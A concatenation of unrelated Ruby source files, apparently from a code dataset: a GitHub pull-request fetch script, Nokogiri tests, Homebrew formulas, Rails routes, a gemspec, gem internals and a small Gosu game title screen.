super(input: input)
end
def output
id = pr['number']
branch_ref = "pr-#{pr['head']['ref']}"
raise 'PR has merge conflicts' if pr['mergeable'] == false && fetch_merge
system("git clone #{depth_flag} --branch #{pr['base']['ref']} #{uri} #{destination} 1>&2")
raise 'git clone failed' unless $CHILD_STATUS.exitstatus.zero?
Dir.chdir(File.join(destination, '.git')) do
File.write('url', pr['html_url'])
File.write('id', pr['number'])
File.write('body', pr['body'])
File.write('branch', pr['head']['ref'])
File.write('base_branch', pr['base']['ref'])
File.write('base_sha', pr['base']['sha'])
File.write('userlogin', pr['user']['login'])
File.write('head_sha', pr['head']['sha'])
File.write('useremail', user['email'])
end
Dir.chdir(destination) do
raise 'git clone failed' unless system("git fetch #{depth_flag} -q origin pull/#{id}/#{remote_ref}:#{branch_ref} 1>&2")
system <<-BASH
git checkout #{branch_ref} 1>&2
git config --add pullrequest.url #{pr['html_url'].to_s.shellescape} 1>&2
git config --add pullrequest.id #{pr['number'].to_s.shellescape} 1>&2
git config --add pullrequest.body #{pr['body'].to_s.shellescape} 1>&2
git config --add pullrequest.branch #{pr['head']['ref'].to_s.shellescape} 1>&2
git config --add pullrequest.basebranch #{pr['base']['ref'].to_s.shellescape} 1>&2
git config --add pullrequest.basesha #{pr['base']['sha'].to_s.shellescape} 1>&2
git config --add pullrequest.userlogin #{pr['user']['login'].to_s.shellescape} 1>&2
git config --add pullrequest.useremail #{user['email'].to_s.shellescape} 1>&2
BASH
case input.params.git.submodules
when 'all', nil
system("git submodule update --init --recursive #{depth_flag} 1>&2")
when Array
input.params.git.submodules.each do |path|
system("git submodule update --init --recursive #{depth_flag} #{path} 1>&2")
end
end
unless input.params.git.disable_lfs
system('git lfs fetch 1>&2')
system('git lfs checkout 1>&2')
end
end
{
'version' => { 'ref' => ref, 'pr' => id.to_s },
'metadata' => [{ 'name' => 'url', 'value' => pr['html_url'] }]
}
end
private
def pr
@pr ||= Octokit.pull_request(input.source.repo, input.version.pr)
end
def user
@user ||= Octokit.user(pr['user']['login'])
rescue StandardError
return {'email' => ''}
end
def uri
input.source.uri || "https://github.com/#{input.source.repo}"
end
def ref
input.version.ref
end
def remote_ref
fetch_merge ? 'merge' : 'head'
end
def fetch_merge
input.params.fetch_merge
end
def depth_flag
if depth = input.params.git.depth
"--depth #{depth}"
else
''
end
end
end
end
if $PROGRAM_NAME == __FILE__
destination = ARGV.shift
command = Commands::In.new(destination: destination)
puts JSON.generate(command.output)
end
| 29.191667 | 127 | 0.587782 |
6a90605a212aeaf3372671603cd21f61b725fd56 | 2,536 | require 'lotus/utils/class'
require 'lotus/views/default'
require 'lotus/views/null_view'
module Lotus
# Rendering policy
#
# @since 0.1.0
# @api private
class RenderingPolicy
STATUS = 0
HEADERS = 1
BODY = 2
LOTUS_ACTION = 'lotus.action'.freeze
SUCCESSFUL_STATUSES = (200..201).freeze
STATUSES_WITHOUT_BODY = Set.new((100..199).to_a << 204 << 205 << 301 << 302 << 304).freeze
EMPTY_BODY = Array.new.freeze
RENDERABLE_FORMATS = [:all, :html].freeze
CONTENT_TYPE = 'Content-Type'.freeze
REQUEST_METHOD = 'REQUEST_METHOD'.freeze
HEAD = 'HEAD'.freeze
def initialize(configuration)
@controller_pattern = %r{#{ configuration.controller_pattern.gsub(/\%\{(controller|action)\}/) { "(?<#{ $1 }>(.*))" } }}
@view_pattern = configuration.view_pattern
@namespace = configuration.namespace
@templates = configuration.templates
end
def render(env, response)
body = _render(env, response) || _render_head(env)
response[BODY] = Array(body) unless body.nil?
response
end
private
def _render(env, response)
if action = renderable?(env)
_render_action(action, response) ||
_render_status_page(action, response)
end
end
def _render_action(action, response)
if successful?(response)
view_for(action, response).render(
action.to_rendering
)
end
end
def _render_status_page(action, response)
if render_status_page?(action, response)
Lotus::Views::Default.render(@templates, response[STATUS], response: response, format: :html)
end
end
def _render_head(env)
EMPTY_BODY if head?(env)
end
def renderable?(env)
!head?(env) and
env.delete(LOTUS_ACTION)
end
def successful?(response)
SUCCESSFUL_STATUSES.include?(response[STATUS])
end
def head?(env)
env[REQUEST_METHOD] == HEAD
end
def render_status_page?(action, response)
RENDERABLE_FORMATS.include?(action.format) &&
!STATUSES_WITHOUT_BODY.include?(response[STATUS])
end
def view_for(action, response)
if response[BODY].empty?
captures = @controller_pattern.match(action.class.name)
Utils::Class.load!(@view_pattern % { controller: captures[:controller], action: captures[:action] }, @namespace)
else
Views::NullView.new(response[BODY])
end
end
end
end
| 27.268817 | 126 | 0.629338 |
8781dc1d9c45786d94400ac94063350a4e3385f4 | 14,464 | # frozen_string_literal: true
require "helper"
module Nokogiri
module XML
class TestDocumentFragment < Nokogiri::TestCase
describe Nokogiri::XML::DocumentFragment do
let(:xml) { Nokogiri::XML.parse(File.read(XML_FILE), XML_FILE) }
def test_replace_text_node
html = "foo"
doc = Nokogiri::XML::DocumentFragment.parse(html)
doc.children[0].replace("bar")
assert_equal("bar", doc.children[0].content)
end
def test_fragment_is_relative
doc = Nokogiri::XML('<root><a xmlns="blah" /></root>')
ctx = doc.root.child
fragment = Nokogiri::XML::DocumentFragment.new(doc, "<hello />", ctx)
hello = fragment.child
assert_equal("hello", hello.name)
assert_equal(doc.root.child.namespace, hello.namespace)
end
def test_node_fragment_is_relative
doc = Nokogiri::XML('<root><a xmlns="blah" /></root>')
assert(doc.root.child)
fragment = doc.root.child.fragment("<hello />")
hello = fragment.child
assert_equal("hello", hello.name)
assert_equal(doc.root.child.namespace, hello.namespace)
end
def test_new
assert(Nokogiri::XML::DocumentFragment.new(xml))
end
def test_fragment_should_have_document
fragment = Nokogiri::XML::DocumentFragment.new(xml)
assert_equal(xml, fragment.document)
end
def test_name
fragment = Nokogiri::XML::DocumentFragment.new(xml)
assert_equal("#document-fragment", fragment.name)
end
def test_static_method
fragment = Nokogiri::XML::DocumentFragment.parse("<div>a</div>")
assert_instance_of(Nokogiri::XML::DocumentFragment, fragment)
end
def test_static_method_with_namespaces
# follows different path in FragmentHandler#start_element which blew up after 597195ff
fragment = Nokogiri::XML::DocumentFragment.parse("<o:div>a</o:div>")
assert_instance_of(Nokogiri::XML::DocumentFragment, fragment)
end
def test_many_fragments
100.times { Nokogiri::XML::DocumentFragment.new(xml) }
end
def test_unparented_text_node_parse
fragment = Nokogiri::XML::DocumentFragment.parse("foo")
fragment.children.after("<bar/>")
end
def test_xml_fragment
fragment = Nokogiri::XML.fragment("<div>a</div>")
assert_equal("<div>a</div>", fragment.to_s)
end
def test_xml_fragment_has_multiple_toplevel_children
doc = "<div>b</div><div>e</div>"
fragment = Nokogiri::XML::Document.new.fragment(doc)
assert_equal("<div>b</div><div>e</div>", fragment.to_s)
end
def test_xml_fragment_has_outer_text
# this test is descriptive, not prescriptive.
doc = "a<div>b</div>"
fragment = Nokogiri::XML::Document.new.fragment(doc)
assert_equal("a<div>b</div>", fragment.to_s)
doc = "<div>b</div>c"
fragment = Nokogiri::XML::Document.new.fragment(doc)
assert_equal("<div>b</div>c", fragment.to_s)
end
def test_xml_fragment_case_sensitivity
doc = "<crazyDiv>b</crazyDiv>"
fragment = Nokogiri::XML::Document.new.fragment(doc)
assert_equal("<crazyDiv>b</crazyDiv>", fragment.to_s)
end
def test_xml_fragment_with_leading_whitespace
doc = " <div>b</div> "
fragment = Nokogiri::XML::Document.new.fragment(doc)
assert_equal(" <div>b</div> ", fragment.to_s)
end
def test_xml_fragment_with_leading_whitespace_and_newline
doc = " \n<div>b</div> "
fragment = Nokogiri::XML::Document.new.fragment(doc)
assert_equal(" \n<div>b</div> ", fragment.to_s)
end
def test_fragment_children_search
fragment = Nokogiri::XML::Document.new.fragment(
'<div><p id="content">hi</p></div>'
)
expected = fragment.children.xpath(".//p")
assert_equal(1, expected.length)
css = fragment.children.css("p")
search_css = fragment.children.search("p")
search_xpath = fragment.children.search(".//p")
assert_equal(expected, css)
assert_equal(expected, search_css)
assert_equal(expected, search_xpath)
end
def test_fragment_css_search_with_whitespace_and_node_removal
# The same xml without leading whitespace in front of the first line
# does not expose the error. Putting both nodes on the same line
# instead also fixes the crash.
fragment = Nokogiri::XML::DocumentFragment.parse(<<~EOXML)
<p id="content">hi</p> x <!--y--> <p>another paragraph</p>
EOXML
children = fragment.css("p")
assert_equal(2, children.length)
# removing the last node instead does not yield the error. Probably the
# node removal leaves around two consecutive text nodes which make the
# css search crash?
children.first.remove
assert_equal(1, fragment.xpath(".//p | self::p").length)
assert_equal(1, fragment.css("p").length)
end
def test_fragment_search_three_ways
frag = Nokogiri::XML::Document.new.fragment('<p id="content">foo</p><p id="content">bar</p>')
expected = frag.xpath('./*[@id = "content"]')
assert_equal(2, expected.length)
[
[:css, "#content"],
[:search, "#content"],
[:search, "./*[@id = 'content']"],
].each do |method, query|
result = frag.send(method, query)
assert_equal(expected, result,
"fragment search with :#{method} using '#{query}' expected '#{expected}' got '#{result}'")
end
end
def test_fragment_search_with_multiple_queries
xml = <<~EOF
<thing>
<div class="title">important thing</div>
</thing>
<thing>
<div class="content">stuff</div>
</thing>
<thing>
<p class="blah">more stuff</div>
</thing>
EOF
fragment = Nokogiri::XML.fragment(xml)
assert_kind_of(Nokogiri::XML::DocumentFragment, fragment)
assert_equal(3, fragment.xpath(".//div", ".//p").length)
assert_equal(3, fragment.css(".title", ".content", "p").length)
assert_equal(3, fragment.search(".//div", "p.blah").length)
end
def test_fragment_without_a_namespace_does_not_get_a_namespace
doc = Nokogiri::XML(<<~EOX)
<root xmlns="http://tenderlovemaking.com/" xmlns:foo="http://flavorjon.es/" xmlns:bar="http://google.com/">
<foo:existing></foo:existing>
</root>
EOX
frag = doc.fragment("<newnode></newnode>")
assert_nil(frag.namespace)
end
def test_fragment_namespace_resolves_against_document_root
doc = Nokogiri::XML(<<~EOX)
<root xmlns:foo="http://flavorjon.es/" xmlns:bar="http://google.com/">
<foo:existing></foo:existing>
</root>
EOX
ns = doc.root.namespace_definitions.detect { |x| x.prefix == "bar" }
frag = doc.fragment("<bar:newnode></bar:newnode>")
assert(frag.children.first.namespace)
assert_equal(ns, frag.children.first.namespace)
end
def test_fragment_invalid_namespace_is_silently_ignored
doc = Nokogiri::XML(<<~EOX)
<root xmlns:foo="http://flavorjon.es/" xmlns:bar="http://google.com/">
<foo:existing></foo:existing>
</root>
EOX
frag = doc.fragment("<baz:newnode></baz:newnode>")
assert_nil(frag.children.first.namespace)
end
def test_decorator_is_applied
x = Module.new do
def awesome!
end
end
util_decorate(xml, x)
fragment = Nokogiri::XML::DocumentFragment.new(xml, "<div>a</div><div>b</div>")
assert(node_set = fragment.css("div"))
assert_respond_to(node_set, :awesome!)
node_set.each do |node|
assert_respond_to(node, :awesome!, node.class)
end
assert_respond_to(fragment.children, :awesome!, fragment.children.class)
end
def test_decorator_is_applied_to_empty_set
x = Module.new do
def awesome!
end
end
util_decorate(xml, x)
fragment = Nokogiri::XML::DocumentFragment.new(xml, "")
assert_respond_to(fragment.children, :awesome!, fragment.children.class)
end
def test_add_node_to_doc_fragment_segfault
frag = Nokogiri::XML::DocumentFragment.new(xml, "<p>hello world</p>")
Nokogiri::XML::Comment.new(frag, "moo")
end
def test_issue_1077_parsing_of_frozen_strings
input = <<~EOS
<?xml version="1.0" encoding="utf-8"?>
<library>
<book title="I like turtles"/>
</library>
EOS
input.freeze
Nokogiri::XML::DocumentFragment.parse(input) # assert_nothing_raised
end
def test_dup_should_exist_in_a_new_document
skip_unless_libxml2("this is only true in the C extension")
# https://github.com/sparklemotion/nokogiri/issues/1063
original = Nokogiri::XML::DocumentFragment.parse("<div><p>hello</p></div>")
duplicate = original.dup
refute_equal(original.document, duplicate.document)
end
def test_dup_should_create_an_xml_document_fragment
# https://github.com/sparklemotion/nokogiri/issues/1846
original = Nokogiri::XML::DocumentFragment.parse("<div><p>hello</p></div>")
duplicate = original.dup
assert_instance_of(Nokogiri::XML::DocumentFragment, duplicate)
end
def test_dup_creates_tree_with_identical_structure
original = Nokogiri::XML::DocumentFragment.parse("<div><p>hello</p></div>")
duplicate = original.dup
assert_equal(original.to_html, duplicate.to_html)
end
def test_dup_creates_mutable_tree
original = Nokogiri::XML::DocumentFragment.parse("<div><p>hello</p></div>")
duplicate = original.dup
duplicate.at_css("div").add_child("<b>hello there</b>")
assert_nil(original.at_css("b"))
refute_nil(duplicate.at_css("b"))
end
def test_for_libxml_in_context_fragment_parsing_bug_workaround
skip_unless_libxml2("valgrind tests should only run with libxml2")
refute_valgrind_errors do
fragment = Nokogiri::XML.fragment("<div></div>")
parent = fragment.children.first
child = parent.parse("<h1></h1>").first
parent.add_child(child)
end
end
def test_for_libxml_in_context_memory_badness_when_encountering_encoding_errors
skip_unless_libxml2("valgrind tests should only run with libxml2")
# see issue #643 for background
refute_valgrind_errors do
html = <<~EOHTML
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=shizzle" />
</head>
<body>
<div>Foo</div>
</body>
</html>
EOHTML
doc = Nokogiri::HTML(html)
doc.at_css("div").replace("Bar")
end
end
describe "subclassing" do
let(:klass) do
Class.new(Nokogiri::XML::DocumentFragment) do
attr_accessor :initialized_with, :initialized_count
def initialize(*args)
super
@initialized_with = args
@initialized_count ||= 0
@initialized_count += 1
end
end
end
describe ".new" do
it "returns an instance of the right class" do
fragment = klass.new(xml, "<div>a</div>")
assert_instance_of(klass, fragment)
end
it "calls #initialize exactly once" do
fragment = klass.new(xml, "<div>a</div>")
assert_equal(1, fragment.initialized_count)
end
it "passes args to #initialize" do
fragment = klass.new(xml, "<div>a</div>")
assert_equal([xml, "<div>a</div>"], fragment.initialized_with)
end
end
it "#dup returns the expected class" do
doc = klass.new(xml, "<div>a</div>").dup
assert_instance_of(klass, doc)
end
describe ".parse" do
it "returns an instance of the right class" do
fragment = klass.parse("<div>a</div>")
assert_instance_of(klass, fragment)
end
it "calls #initialize exactly once" do
fragment = klass.parse("<div>a</div>")
assert_equal(1, fragment.initialized_count)
end
it "passes the fragment" do
fragment = klass.parse("<div>a</div>")
assert_equal(Nokogiri::XML::DocumentFragment.parse("<div>a</div>").to_s, fragment.to_s)
end
end
end
describe "#path" do
it "should return '?'" do
# see https://github.com/sparklemotion/nokogiri/issues/2250
# this behavior is clearly undesirable, but is what libxml <= 2.9.10 returned, and so we
# do this for now to preserve the behavior across libxml2 versions.
xml = <<~EOF
<root1></root1>
<root2></root2>
EOF
frag = Nokogiri::XML::DocumentFragment.parse(xml)
assert_equal "?", frag.path
# # TODO: we should circle back and fix both the `#path` behavior and the `#xpath`
# # behavior so we can round-trip and get the DocumentFragment back again.
# assert_equal(frag, frag.at_xpath(doc.path)) # make sure we can round-trip
end
end
end
end
end
end
| 36.897959 | 119 | 0.577848 |
18ccc6e6f8ec12a4d3599c15dba78934ebdfdaa8 | 1,615 | class GitNow < Formula
desc "Light, temporary commits for git"
homepage "https://github.com/iwata/git-now"
url "https://github.com/iwata/git-now.git",
:tag => "v0.1.1.0",
:revision => "a07a05893b9ddf784833b3d4b410c843633d0f71"
head "https://github.com/iwata/git-now.git"
bottle do
cellar :any_skip_relocation
sha256 "ad78d8ab5cf008375bdeb03f0b1289733fba33fac43535f38117e5d8af50f06b" => :high_sierra
sha256 "ffde5161accdd2bab777e610302f858e1bf9e17f0ee1a41fb4e7b33a0d9f5eb4" => :sierra
sha256 "7126e867e543659b9750041412e737407fb94f9dbb38fea1edf16cec8027aa64" => :el_capitan
sha256 "748cd8691ad94b407f892ffa7f8e12c183b7326208efd9ac6dafbe1b8fda9565" => :yosemite
sha256 "c19eda078da8974bde40ee07eac5701e9295d56bd59a6d18ea21c3d337b50e02" => :mavericks
sha256 "df4b4b7da7d3f0dd563858b126bece61cd99ed697521000b5c593c47753d7a54" => :x86_64_linux # glibc 2.19
end
depends_on "gnu-getopt"
def install
# Fix bashism in git-now-add when executed by git-now
inreplace "git-now", "#!/bin/sh", "#!/bin/bash"
system "make", "prefix=#{libexec}", "install"
(bin/"git-now").write <<-EOS.undent
#!/bin/sh
PATH=#{Formula["gnu-getopt"].opt_bin}:$PATH #{libexec}/bin/git-now "$@"
EOS
zsh_completion.install "etc/_git-now"
end
test do
(testpath/".gitconfig").write <<-EOS.undent
[user]
name = Real Person
email = [email protected]
EOS
touch "file1"
system "git", "init"
system "git", "add", "file1"
system bin/"git-now"
assert_match "from now", shell_output("git log -1")
end
end
| 32.959184 | 107 | 0.705263 |
7a7f8052b8f314afc195524e5057a6edbe7e57bd | 983 | Rails.application.routes.draw do
devise_for :users
get 'get_user' => 'users#get_user'
get 'render_post' => 'posts#render_post'
get 'active_chatrooms' => 'chatrooms#active_chatrooms'
resources :users do
resources :posts do
resources :comments, :only => [:show, :create, :destroy, :edit, :update, :new] do
member do
post 'like'
end
end
member do
get 'show_comments'
post 'like'
end
end
resources :friendships, only: [:index, :destroy, :update, :create]
end
resources :chatrooms do
resources :messages
member do
get 'del_from_sessions'
get 'open_chat'
end
end
devise_scope :user do
authenticated :user do
#root 'users#index', as: :authenticated_root
root 'home#index', as: :authenticated_root
get 'home/autocomplete_user_username'
end
unauthenticated do
root 'devise/sessions#new', as: :unauthenticated_root
end
end
end
| 23.404762 | 87 | 0.639878 |
bb27015ebfe496fb8597f3275343129b3049d2d5 | 551 | # frozen_string_literal: true
require 'tilt'
# Load tilt/haml only when haml is available
begin
require 'haml'
rescue LoadError
else
require 'tilt/haml'
end
require_relative 'engine'
module Faml
class Tilt < Tilt::Template
def prepare
filename = nil
if file
filename = File.expand_path(file)
end
@code = Engine.new(options.merge(filename: filename)).call(data)
end
def precompiled_template(_locals = {})
@code
end
end
::Tilt.register(Tilt, 'haml')
::Tilt.register(Tilt, 'faml')
end
| 18.366667 | 70 | 0.669691 |
280a2c72c3c3d921eee04036d3ce957767747eee | 1,150 | # encoding: UTF-8
# Copyright 2012 Twitter, Inc
# http://www.apache.org/licenses/LICENSE-2.0
require 'spec_helper'
include TwitterCldr::Formatters
describe CurrencyFormatter do
describe "#format" do
before(:each) do
@formatter = CurrencyFormatter.new(:locale => :msa)
end
it "should use a dollar sign when no other currency symbol is given (and default to a precision of 2)" do
@formatter.format(12).should == "$12.00"
end
it "handles negative numbers" do
# yes, the parentheses really are part of the format, don't worry about it
@formatter.format(-12).should == "-($12.00)"
end
it "should use the specified currency symbol when specified" do
# S/. is the symbol for the Peruvian Nuevo Sol, just in case you were curious
@formatter.format(12, :currency => "S/.").should == "S/.12.00"
end
it "should use the currency symbol for the corresponding currency code" do
@formatter.format(12, :currency => "PEN").should == "S/.12.00"
end
it "overrides the default precision" do
@formatter.format(12, :precision => 3).should == "$12.000"
end
end
end | 30.263158 | 109 | 0.666087 |
084c35a9623408dbf84e49f3d311b3cd045104c1 | 1,644 | class Asio < Formula
desc "Cross-platform C++ Library for asynchronous programming"
homepage "https://think-async.com/Asio"
url "https://downloads.sourceforge.net/project/asio/asio/1.14.0%20%28Stable%29/asio-1.14.0.tar.bz2"
sha256 "2e1be1a518a568525f79b5734d13731b6b4e4399ec576a0961db6e2d86112973"
head "https://github.com/chriskohlhoff/asio.git"
bottle do
cellar :any
sha256 "3f2c8ab0aadadda4d4707b834787d0c02841a31cec763b4c4d32ca3f859bd314" => :catalina
sha256 "7be9a1e39bbd3fa59059fc9d8d98f7f43520da052cf245f195bbdd325ec1a8ec" => :mojave
sha256 "ea18bc6cca19d15ff019a98be7a9c31c34e477b5daac54ce7379f02a6635247f" => :high_sierra
end
depends_on "autoconf" => :build
depends_on "automake" => :build
depends_on "[email protected]"
def install
ENV.cxx11
if build.head?
cd "asio"
system "./autogen.sh"
else
system "autoconf"
end
system "./configure", "--disable-dependency-tracking",
"--disable-silent-rules",
"--prefix=#{prefix}",
"--with-boost=no"
system "make", "install"
pkgshare.install "src/examples"
end
test do
found = [pkgshare/"examples/cpp11/http/server/http_server",
pkgshare/"examples/cpp03/http/server/http_server"].select(&:exist?)
raise "no http_server example file found" if found.empty?
pid = fork do
exec found.first, "127.0.0.1", "8080", "."
end
sleep 1
begin
assert_match /404 Not Found/, shell_output("curl http://127.0.0.1:8080")
ensure
Process.kill 9, pid
Process.wait pid
end
end
end
| 30.444444 | 101 | 0.666058 |
ed6af368434c8118252a2558831e4196a7961535 | 1,953 | # -*- encoding: utf-8 -*-
$LOAD_PATH.unshift File.expand_path("../lib", __FILE__)
require "cucumber/platform"
Gem::Specification.new do |s|
s.name = 'cucumber'
s.version = Cucumber::VERSION
s.authors = ["Aslak Hellesøy"]
s.description = 'Behaviour Driven Development with elegance and joy'
s.summary = "cucumber-#{s.version}"
s.email = '[email protected]'
s.license = 'MIT'
s.homepage = "http://cukes.info"
s.platform = Gem::Platform::RUBY
s.required_ruby_version = ">= 1.9.3"
s.add_dependency 'cucumber-core', '~> 0.2'
s.add_dependency 'builder', '>= 2.1.2'
s.add_dependency 'diff-lcs', '>= 1.1.3'
s.add_dependency 'gherkin', '~> 2.12'
s.add_dependency 'multi_json', '>= 1.7.5', '< 2.0'
s.add_dependency 'multi_test', '>= 0.0.2'
s.add_development_dependency 'aruba', '~> 0.5.3'
s.add_development_dependency 'json', '~> 1.7'
s.add_development_dependency 'nokogiri', '~> 1.5'
s.add_development_dependency 'rake', '>= 0.9.2'
s.add_development_dependency 'rspec', '>= 2.13'
s.add_development_dependency 'simplecov', '>= 0.6.2'
s.add_development_dependency 'coveralls', '~> 0.7'
s.add_development_dependency 'syntax', '>= 1.0.0'
# For Documentation:
s.add_development_dependency 'bcat', '~> 0.6.2'
s.add_development_dependency 'kramdown', '~> 0.14'
s.add_development_dependency 'yard', '~> 0.8.0'
# Needed for examples (rake examples)
s.add_development_dependency 'capybara', '>= 2.1'
s.add_development_dependency 'rack-test', '>= 0.6.1'
s.add_development_dependency 'sinatra', '>= 1.3.2'
s.rubygems_version = ">= 1.6.1"
s.files = `git ls-files`.split("\n").reject {|path| path =~ /\.gitignore$/ }
s.test_files = `git ls-files -- {spec,features}/*`.split("\n")
s.executables = `git ls-files -- bin/*`.split("\n").map{ |f| File.basename(f) }
s.rdoc_options = ["--charset=UTF-8"]
s.require_path = "lib"
end
| 39.06 | 89 | 0.640553 |
5d8f3789555b2805f8ba11056ae7e33e863577f1 | 2,620 | # frozen_string_literal: true
require 'openssl'
require 'acme-client'
require 'redis'
require 'letsencrypt/railtie'
require 'letsencrypt/engine'
require 'letsencrypt/configuration'
require 'letsencrypt/logger_proxy'
require 'letsencrypt/redis'
# :nodoc:
module LetsEncrypt
# Production mode API Endpoint
ENDPOINT = 'https://acme-v02.api.letsencrypt.org/directory'
# Staging mode API Endpoint, the rate limit is higher
# but got invalid certificate for testing
ENDPOINT_STAGING = 'https://acme-staging-v02.api.letsencrypt.org/directory'
class << self
# Create the ACME Client to Let's Encrypt
def client
@client ||= ::Acme::Client.new(
private_key: private_key,
directory: directory
)
end
def private_key
@private_key ||= OpenSSL::PKey::RSA.new(load_private_key)
end
def load_private_key
return ENV['LETSENCRYPT_PRIVATE_KEY'] if config.use_env_key
return File.open(private_key_path) if File.exist?(private_key_path)
generate_private_key
end
# Get current using Let's Encrypt endpoint
def directory
@endpoint ||= config.use_staging? ? ENDPOINT_STAGING : ENDPOINT
end
# Register a Let's Encrypt account
#
# This is required a private key to do this,
# and Let's Encrypt will use this private key to
# connect with domain and assign the owner who can
# renew and revoked.
def register(email)
account = client.new_account(contact: "mailto:#{email}", terms_of_service_agreed: true)
logger.info "Successfully registered private key with address #{email}"
account.kid # TODO: Save KID
true
end
def private_key_path
config.private_key_path || Rails.root.join('config', 'letsencrypt.key')
end
def generate_private_key
key = OpenSSL::PKey::RSA.new(4096)
File.open(private_key_path, 'w') { |f| f.write(key.to_s) }
logger.info "Created new private key for Let's Encrypt"
key
end
def logger
@logger ||= LoggerProxy.new(Rails.logger, tags: ['LetsEncrypt'])
end
# Config how to Let's Encrypt works for Rails
#
# LetsEncrypt.config do |config|
# # Always use production mode to connect Let's Encrypt API server
# config.use_staging = false
# end
def config(&block)
@config ||= Configuration.new
instance_exec(@config, &block) if block_given?
@config
end
# @api private
def table_name_prefix
'letsencrypt_'
end
def certificate_model
@certificate_model ||= config.certificate_model.constantize
end
end
end
| 27.578947 | 93 | 0.683206 |
39cb01dbdee74eb0eb9ccadcaf4bbfa06a0f925f | 5,866 | class Title
def initialize(window)
@window = window
@cursor = 0
@white = 0xffffffff
@black = 0xff000000
@mode = :title # :title, :white_fade
@animation = Gosu::Image::load_tiles(window, "media/sprites/ruby.png", 16, 16, true)
calc_animation
@corn = Gosu::Image::load_tiles(window, "media/sprites/sapphire_corn.png", 16, 16, true)
@pumpkin = Gosu::Image::load_tiles(window, "media/sprites/emerald_pumpkin.png", 16, 16, true)
@tomato = Gosu::Image::load_tiles(window, "media/sprites/amethyst_tomato.png", 16, 16, true)
@font = Gosu::Font.new(@window, "Courier", 12)
@menu_list = ["New Game", "Quit"]
@rubys = Array.new
@crops = Array.new
@ruby_size = 2.0
@ruby_x, @ruby_y = 352, 352
calc_ruby_xy
@x, @y, @h, @w, @b = 247, 500, 114, 210, 5
end
def interact
if @cursor == 0
fade_out
@mode = :white_fade
else
@window.close_game
end
end
def move_up
@cursor == 0 ? @cursor = 1 : @cursor -= 1
end
def move_down
@cursor == 1 ? @cursor = 0 : @cursor += 1
end
def start_game
@window.sounds.effect(:fade_out,:start_game)
@window.effect(:white_fade)
@window.mode = :field
end
def update
case @mode
when :white_fade
if @delta <= @final_color
@delta += 16777216 * 8 # 1/256 for alpha column!
else
start_game
end
else # :title
calc_animation
if rand(100) < 4 && @rubys.size < 250
@rubys.push(TitleImage.new(@animation))
if @ruby_size <= 20
@ruby_size += 0.1
calc_ruby_xy
end
end
if rand(100) < 4 && @crops.size < 250
@crops.push(TitleCrop.new([@corn, @tomato, @pumpkin].sample))
end
@rubys.each {|ruby| ruby.move }
@crops.each {|crop| crop.grow }
end
end
def calc_ruby_xy
@ruby_x = @ruby_y = 352 - 8 * @ruby_size
end
def calc_animation
@current_anim =
case Gosu::milliseconds / 2000 % 4
when 0 then [@animation[8],@animation[9],@animation[10],@animation[11]]
when 1 then [@animation[0],@animation[1],@animation[2],@animation[3]]
when 2 then [@animation[12],@animation[13],@animation[14],@animation[15]]
when 3 then [@animation[4],@animation[5],@animation[6],@animation[7]]
end
end
def fade_out
@final_color = 0xFFFFFFFF
@delta = 0x00FFFFFF
@window.set_timer(60)
end
def draw
# white background
@window.draw_quad(0, 0, @black, 704, 0, @black, 0, 704, @black, 704, 704, @black, 0)
#text
@font.draw("GemFarm", 282, 50, 2, 4.0, 4.0, @white)
@font.draw("A Farming Adventure", 162, 100, 2, 4.0, 4.0, @white)
# picture
img = @current_anim[Gosu::milliseconds / 200 % 4]
img.draw(@ruby_x, @ruby_x, 2, @ruby_size, @ruby_size)
@rubys.each {|ruby| ruby.draw }
@crops.each {|crop| crop.draw }
# menu with two options (new game/quit)
@window.draw_quad(@x - @b, @y - @b, @white, @x + @w + @b, @y - @b, @white, @x - @b, @y + @h + @b, @white, @x + @w + @b, @y + @h + @b, @white, 4) #black box
@window.draw_quad(@x, @y, @black, @x + @w, @y, @black, @x, @y + @h, @black, @x + @w, @y + @h, @black, 5) # white box
@menu_list.each_with_index do |text, index|
@font.draw("#{text}", @x + 30 , @y + 10 + (index * 52), 6, 4.0, 4.0, @white)
end
@window.draw_triangle(@x + 5, @cursor * 52 + 20 + @y, @white, @x + 5, @cursor * 52 + 40 + @y, @white, @x + 22, @cursor * 52 + 30 + @y, @white, 7) # cursor
case @mode
# fade
when :white_fade then @window.draw_quad(0, 0, @delta, 704, 0, @delta, 0, 704, @delta, 704, 704, @delta, 10)
end
end
end
class TitleCrop
def initialize(animation)
@animation = animation
@current_anim = [@animation[0],@animation[1]]
@stage = 0
@color = Gosu::Color.new(0xff000000)
@color.red = rand(256 - 40) + 40
@color.green = rand(256 - 40) + 40
@color.blue = rand(256 - 40) + 40
@ratio = rand(11) / 10.00 + 3.5
@speed = rand(500) + 150
@x = rand * 704
@y = rand * 704
end
def grow
if rand(@speed / 5) < 2
@stage == 3 ? @stage = 0 : @stage += 1
@current_anim =
case @stage
when 0 then [@animation[0],@animation[1]]
when 1 then [@animation[2],@animation[3]]
when 2 then [@animation[4],@animation[5]]
when 3 then [@animation[6],@animation[7]]
end
end
end
def draw
img = @current_anim[Gosu::milliseconds / @speed % 2]
img.draw(@x, @y, 1, @ratio, @ratio, @color, :add)
end
end
class TitleImage
def initialize(animation)
@animation = animation
@color = Gosu::Color.new(0xff000000)
@color.red = rand(256 - 40) + 40
@color.green = rand(256 - 40) + 40
@color.blue = rand(256 - 40) + 40
@ratio = rand(11) / 10.00 + 3.5
@speed = rand(500) + 150
@x = rand * 704
@y = rand * 704
@direction = :down
@down_anim = [@animation[0],@animation[1],@animation[2],@animation[3]]
@left_anim = [@animation[4],@animation[5],@animation[6],@animation[7]]
@up_anim = [@animation[8],@animation[9],@animation[10],@animation[11]]
@right_anim = [@animation[12],@animation[13],@animation[14],@animation[15]]
end
def move
if rand(@speed / 5) < 2
case rand(0..3)
when 0
@x += 8 * @ratio
@direction = :right
when 1
@x -= 8 * @ratio
@direction = :left
when 2
@y -= 8 * @ratio
@direction = :up
when 3
@y += 8 * @ratio
@direction = :down
end
end
end
def draw
cur_anim =
case @direction
when :right then @right_anim
when :left then @left_anim
when :up then @up_anim
when :down then @down_anim
end
img = cur_anim[Gosu::milliseconds / @speed % 4]
img.draw(@x - img.width, @y - img.height, 1, @ratio, @ratio, @color, :add)
end
end | 29.626263 | 159 | 0.571258 |
f7262d5d05a4e9a2616ccae87a2b4003fb9fd6d1 | 1,152 | # WARNING ABOUT GENERATED CODE
#
# This file is generated. See the contributing guide for more information:
# https://github.com/aws/aws-sdk-ruby/blob/master/CONTRIBUTING.md
#
# WARNING ABOUT GENERATED CODE
